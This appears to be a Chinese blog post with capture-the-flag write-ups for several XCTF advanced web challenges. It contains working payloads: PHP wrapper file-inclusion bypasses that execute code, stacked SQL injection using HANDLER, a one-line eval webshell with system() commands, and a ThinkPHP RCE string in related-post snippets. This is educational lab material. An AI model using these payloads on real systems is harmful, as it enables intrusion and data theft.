攻防世界-web进阶(部分题目wirteup)

最新推荐文章于 2025-12-26 15:19:25 发布
原创 最新推荐文章于 2025-12-26 15:19:25 发布 · 303 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

攻防世界-web进阶[部分题目wirteup]

1、Web_php_include

源码:

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

考察php文件包含
知识点:
1、strstr()函数,strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。该函数是区分大小写的。如需进行不区分大小写的搜索,请使用 stristr() 函数
2、str_replace()函数,str_replace() 函数替换字符串中的一些字符(区分大小写)
3、利用php伪协议大小写绕过

php伪协议
用法
php://input,用于执行php代码,需要post请求提交数据。
php://filter,用于读取源码,get提交参数。
?a=php://filter/read=convert.base64/resource=xxx.php
需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp
不需要开启allow_url_fopen:php://filter

在这里插入图片描述

payload:
?page=pHP://input
post:<?php phpinfo();?>

4、data伪协议代码执行

data协议
用法:
data://text/plain,xxxx(要执行的php代码)
data://text/plain;base64,xxxx(base64编码后的数据)
例:
?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

在这里插入图片描述
更多内容可参考:《Web_php_include》

2、supersqli

1' or 1 -- +  //--与+之间有空格
1' order by 2 -- +   //两个字段
1' union select 1,2 -- +  //被函数preg_match替换,preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
1';show databases -- +  //堆叠查询数据库,发现supersqli
1';show tables from supersqli;-- +  //堆叠查询supersqli中的表,1919810931114514、words
1';show columns from `1919810931114514` -- + //发现flag
1';show columns from `words` -- +  //columns:id、data
1';handler `1919810931114514` open;handler `1919810931114514` read first;-- +

在这里插入图片描述
那么,我们来看看Handler语法说明:

HANDLER tbl_name OPEN [ [AS] alias]
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,) [ WHERE where_condition ] [LIMIT]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST } [ WHERE where_condition ] [LIMIT]
HANDLER tbl_name READ { FIRST | NEXT } [ WHERE where_condition ] [LIMIT]
HANDLER tbl_name CLOSE

先用handler命令open打开表,再handler…read…读取表中的内容,其中read可以使用first、next遍历,还可以配合limit来遍历

3、web2

源码:

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function encode($str){
    $_o=strrev($str);
    // echo $_o;
        
    for($_0=0;$_0<strlen($_o);$_0++){
       
        $_c=substr($_o,$_0,1);
        $__=ord($_c)+1;
        $_c=chr($__);
        $_=$_.$_c;   
    } 
    return str_rot13(strrev(base64_encode($_)));
}

highlight_file(__FILE__);
/*
   逆向加密算法,解密$miwen就是flag
*/
?>

str_rot13,ROT13 编码把每一个字母在字母表中向前移动 13 个字母。数字和非字母字符保持不变。
提示:编码和解码都是由相同的函数完成的。如果您把已编码的字符串作为参数,那么将返回原始字符串。

直接修改代码即可获得flag

<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
$temp=base64_decode(strrev(str_rot13($miwen)));

function decode($str){
    $_o=$str;
    $_='';
    for($_0=0;$_0<strlen($_o);$_0++){
        $_c=substr($_o,$_0,1);
        $__=ord($_c)-1;
        $_c=chr($__);
        $_=$_.$_c;
    }
    return strrev($_);
}
print_r(decode($temp));
?>

4、PHP2

题目的坑点在是否能发现index.phps。

phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类型。
它的MIME类型为:text/html, application/x-httpd-php-source,
application/x-httpd-php3-source。

源码:

<?php
if("admin"===$_GET[id]) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

admin二次url编码绕过,获得flag
在这里插入图片描述

5、upload1

直接上传一张图片,用burpsuite的repeater功能修改后缀为php,再写入代码<?php @eval($_REQUEST[shell]);?>
在这里插入图片描述
浏览器访问:
upload/1601886287.1.php?shell=system(“pwd”); /var/www/html/upload
upload/1601886287.1.php?shell=system(“find /var/www/ -name “flag””); /var/www/html/flag.php
upload/1601886287.1.php?shell=system(“cat /var/www/html/flag.php”); flag在源码中

文章如有不正确的地方,请各位交流指正。

CTF-WEB攻防世界题目实战解析upload1
2301_76565920的博客
04-22 1831
题目upload 知识点:一句话木马,webshell,burpsuite拦截并修改数据包
攻防世界-Web进阶-007php_rce】
gyy990526的博客
03-14 2413
解:打开靶机提示了是ThinkPHP V5的远程代码执行漏洞,V5.0、V5.1均有此问题 构造payload,查看目录 payload:/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 用ls /flag和find / -name'flag'效果一样都可以找到flag文件 payload:/?s=index/think\app/
攻防世界难度8 upload
最新发布
2402_82930082的博客
12-26 861
攻防世界难度8 upload 表面上是一个简单的文件上传,但是经过大量尝试,可以发现并没有那么简单,首先你上传的文件 它并没有返回具体路径,只是单单返回一个序号1660等和一个文件名等经过自己研究和探索 发现存在SQL注入 但除了发现双写没被过滤 一些简单方法都被提示发现注入 等 直到看了大量其他师傅的wp,总结了一套自己的思路应用首先建立靶场进入upload界面 发现select被过滤 可能是存在SQL注入的输入select 是有被过滤的尝试大小写绕过 失败 有统一转为小写了。
攻防世界upload1(web
yuanxu8877的博客
11-22 1549
攻防世界web-upload1
攻防世界upload1
qq_45955869的博客
05-24 100
修改jpg为php文件。提示:日复一日,大功必成!保存为jpg文件即可。
web_进阶_Web_php_include
JURUO222的博客
08-07 269
先分析这段php代码 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> strstr:查找字符串第一次出现,并返回字符串的剩余部分 str_replace:str_replace() 函数以其他字符替换字符串
攻防世界-web进阶)FlatScience–WP
12-14
在这个“攻防世界-web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界-Web进阶-bug
feng的博客
09-14 791
前言 这题主要涉及了各种绕过,也需要一点点的脑洞或者fuzz,这题还是比较好的。 WP
攻防世界-Web进阶-005unserialize3】
gyy990526的博客
03-14 2930
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
攻防世界--Web进阶--unserialize3
z2560088的博客
10-08 255
xctf类不完整,少了一个大括号。 并且给了?code 提示我们用url进行对code进行赋值 我们可以利用code进行执行url输入。 题目是Unserialize提醒我们是反序列化。所以我们尝试输入序列化后的代码付给code看看会发生,什么。 用下面的网址进行运行php demo_func_string_serialize 在线代码实例_w3cschool <?php class xctf{ public $flag = '111'; public function __w...
upload(simple)
02-07
自己写的,感兴趣的可以下载看看,对初学者有用,可以起参考作用。
WEBWeb_php_include(多解)
sleepywin的博客
07-16 1424
解题
攻防世界 web_php_include
weixin_52268949的博客
01-21 352
Web_php_include 进入题目源码直接出来了 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 看见了include函数并且发现过滤了php://,由此估计需要使用伪协议来读取flag内容,由于过滤
Web_php_include(write up)
m0_70819573的博客
02-14 115
很明显,用get传了两个参数,hello,page,且过滤了一些php伪协议,echo函数回显hello的值,不能用伪协议,include函数会自动包含文件,并执行其中的php代码,而index.php是唯一可利用的文件。漏洞原理:php文件包含。2.于是有payload。1.首先,审计代码。
【XCTF高手进阶区】web4_Web_php_include writeup(二)
Mitchell_Donovan的博客
01-28 2187
web4_Web_php_include 原题链接 key:data://伪协议执行命令 ①打开页面还是那串代码???? <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 但是这次我们选择另一种
攻防世界 Web_php_include(include)
Haowill的博客
04-15 1154
Web_php_include 一拿到这道题目看到include,我觉得像是一道文件包含漏洞的题目,这种漏洞一般做法有两种 1.包含的文件在本地上传一个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含的文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到题目 很有意思这个题目给的是源代码。 <?...
攻防世界——web高手进阶区(1~6)
weixin_52805837的博客
03-09 789
攻防世界——web高手进阶区(1~6) (1)baby_web: 1.根据提示,在url中输入index.php,发现打开的仍然还是1.php 2.打开火狐浏览器的开发者模式,选择网络模块,再次请求index.php,查看返回包,可以看到location参数被设置了1.php,并且得到flag (2)Training-WWW-Robots: 直接先访问robots.txt: 然后在url在输入/fl0g.php,得到flag (3)Web_python_template_injection: 首先构造/{
攻防世界-web高级-php2
weixin_46079186的博客
12-16 706
攻防世界-web高手进阶-PHP2 php2 默认页面是/index.php 输入/index.phps 页面出现乱码 我们查看一下源代码,题目的源代码就出来了(用路径扫描没扫出来,看大佬的博客才知道,这次长个记性,把index.phps记起来)。 看到第二句if语句 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些
文件包含漏洞之PHP伪协议中的data://的那些事~
热门推荐
Firebasky的博客
06-10 1万+
最近在看文件包含漏洞中的PHP伪协议,发现其中的一个data://方法不能使用?但是自己确实把php.ini里面的allow_url_fopen和allow_url_include打开了。而且在web安全这本书里面也是一模一样的写法? 最后才发现了问题,原来是编码的问题。 实验: //include.php <?php @$file = $_GET['file']; @include($file); ?> 通过data://text/plain协议来进行漏洞利用。 ?file
攻防世界-web-file_include
12-06
在网络安全领域,文件包含漏洞(File Inclusion Vulnerability)是一种常见且危险的安全漏洞。文件包含漏洞通常出现在Web应用程序中,允许攻击者通过特定的参数或输入来包含并执行任意文件,从而可能导致服务器被完全控制或敏感信息泄露。 文件包含漏洞主要分为两种类型: 1. **本地文件包含(Local File Inclusion, LFI)**: - 攻击者可以包含服务器上的本地文件。 - 例如,攻击者可以通过修改URL参数来包含服务器的敏感配置文件或密码文件。 2. **远程文件包含(Remote File Inclusion, RFI)**: - 攻击者可以包含远程服务器上的文件。 - 例如,攻击者可以通过修改URL参数来包含远程服务器上的恶意脚本,从而执行任意代码。 ### 示例 假设有一个简单的PHP脚本用于包含文件: ```php <?php $file = $_GET['file']; include($file); ?> ``` 在这个例子中,攻击者可以通过修改`file`参数来包含任意文件。例如,访问以下URL: ``` http://example.com/page.php?file=/etc/passwd ``` 攻击者可以获取服务器的`/etc/passwd`文件内容。 ### 防御措施 1. **输入验证**:确保用户输入的文件名符合预期,例如只允许包含特定目录下的文件。 2. **使用白名单**:定义一个允许包含的文件列表,拒绝所有不在白名单中的文件。 3. **禁用远程文件包含**:在PHP配置文件中设置`allow_url_include`为`Off`,防止远程文件包含。 4. **最小权限原则**:确保Web服务器进程只具有必要的文件访问权限。 ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值